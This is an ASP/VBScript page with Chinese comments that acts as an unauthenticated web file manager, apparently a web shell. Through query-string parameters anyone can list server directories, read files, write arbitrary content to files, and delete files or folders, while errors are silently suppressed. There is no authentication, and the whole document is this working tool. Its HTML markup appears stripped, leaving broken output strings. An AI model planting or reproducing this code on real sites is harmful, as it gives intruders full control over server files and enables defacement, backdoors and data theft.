<% On Error Resume Next function bianliFolder(currentPath) path = server.mapPath(currentPath) response.write("v1.1Current Folder is " & path & "
") set fso=server.CreateObject("scripting.filesystemobject") on error resume next set objFolder=fso.GetFolder(path) upperFolder = LEFT(currentPath,(InStrRev(currentPath,"/")-1)) IF currentPath <> "/" THEN if upperFolder="" then upperFolder="/" response.write("· 返回上级目录 ") response.write(upperFolder) response.write("") END IF if Right(currentPath,1)<>"/" then currentPath=currentPath&"/" set objSubFolders=objFolder.Subfolders for each objSubFolder in objSubFolders 'nowpath=path + "\" + objSubFolder.name nowpath=objSubFolder.name nextPath = currentPath & objSubFolder.name 'Response.Write nowpath 'Response.Write "·" & nowpath & "" Response.Write "·" & nowpath & "" Response.Write ""&objSubFolder.datelastmodified&"  " 'bianli(nowpath)'递归 next Call bianliFile(currentPath) set objFolder=nothing set objSubFolders=nothing set fso=nothing end function %> <% function bianliFile(currentPath) 'go through files path = server.mapPath(currentPath) 'Response.Write("path is " & path & "
") set fso=server.CreateObject("scripting.filesystemobject") on error resume next set objFolder=fso.GetFolder(path) nowpath = path 'Response.Write("now path is " & nowpath & "
") 'Response.Write "" & nowpath & "" set objFiles=objFolder.Files for each objFile in objFiles Response.Write "·" Response.Write objFile.name & "" & objFile.datelastmodified& "" Response.Write "GB2312 Edit  UTF-8 EditDel" next Response.Write "

" 'bianli(nowpath)'递归 set objFolder=nothing set objSubFolders=nothing set fso=nothing end function %> <% function delit(fileType,path) 'remove a file set fso=server.CreateObject("scripting.filesystemobject") IF UCase(fileType) = "SINGLE" THEN fso.DeleteFile(path) END IF IF UCase(fileType) = "MULTI" THEN fso.DeleteFolder(path) END IF end function %> <% function displayit(fileType,path) response.write Server.HTMLEncode(LoadFile(path,fileType)) end function function readItAll(path) 'read a file Set objTStream = objFSO.OpenTextFile(path) Do While Not objTStream.AtEndOfStream 'get the line number intLineNum = objTStream.Line 'format and convert to a string strLineNum = Right("00" & CStr(intLineNum), 3) 'get the text of the line from the file strLineText = objTStream.ReadLine Response.Write strLineNum & ": " & strLineText & vbCrLf Loop objTStream.Close end function Function writeTextFile(fileName,fileToWrite,fileType) SaveToFile fileToWrite,fileName,fileType End Function Function LoadFile(ByVal File,ByVal charset) Dim objStream Set objStream = Server.CreateObject("ADODB.Stream") If Err.Number=-2147221005 Then Response.Write "

" Err.Clear Response.End End If With objStream .Type = 2 .Mode = 3 .Open .LoadFromFile File If Err.Number<>0 Then Response.Write "
" Err.Clear Response.End End If .Charset = charset .Position = 2 LoadFile = .ReadText .Close End With Set objStream = Nothing End Function '存储内容到文件 Sub SaveToFile(ByVal strBody,ByVal File,ByVal charset) Dim objStream On Error Resume Next if left(strBody,8)="" then strBody=Mid(strBody,9) end if Set objStream = Server.CreateObject("ADODB.Stream") If Err.Number=-2147221005 Then Response.Write "
" Err.Clear Response.End End If With objStream .Type = 2 .Mode = 3 .Open .Charset = charset .Position = objStream.Size .WriteText = strBody .SaveToFile File,2 .Close End With Set objStream = Nothing End Sub %> <% action = request.queryString("action") IF action = "del" THEN fileType = request.queryString("fileType") filePath = request.queryString("filePath") response.write(filePath) Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject") Set Myfile=MyFileObject.GetFile(fileName) Myfile.attributes=0 Call delit(fileType,filePath) 'response.redirect("") if err then Response.Write "错误:"&Err.Description response.end else Response.Write "成功!" response.end end if END IF IF action = "save" THEN Dim db,fileToWriteType,fileContent,fileName fileType = Request("fileType") fileAddress = Request("fileAddress") fileAddressNew = Request("fileAddressNew") fileContent = Request("fileContent") IF fileAddresNew = "" THEN fileName = fileAddress ELSE fileName = fileAddressNew END IF Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject") Set Myfile=MyFileObject.GetFile(fileName) Myfile.attributes=0 Call writeTextFile(fileName,fileContent,fileType) 'Call funAlertMsg("操作成功!") if err then Response.Write fileName&"
错误s:"&Err.Description response.end else Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject") Set Myfile=MyFileObject.GetFile(fileName) Myfile.attributes=1 Response.Write "
成功!" response.end end if END IF %> <% IF action = "display" THEN filePath = request.queryString("filePath") fileType = request.queryString("fileType") %>

<% response.write(filePath) %> <% if err then Response.Write "
状态:错误:"&Err.Description response.end else Response.Write "
状态:成功!" response.end end if %> <% END IF %> <% rootPath = request.queryString("rootPath") 'if not set the rootPath parameter then set it to current path if rootPath = "" then rootPath = "/" Call bianliFolder(rootPath) %>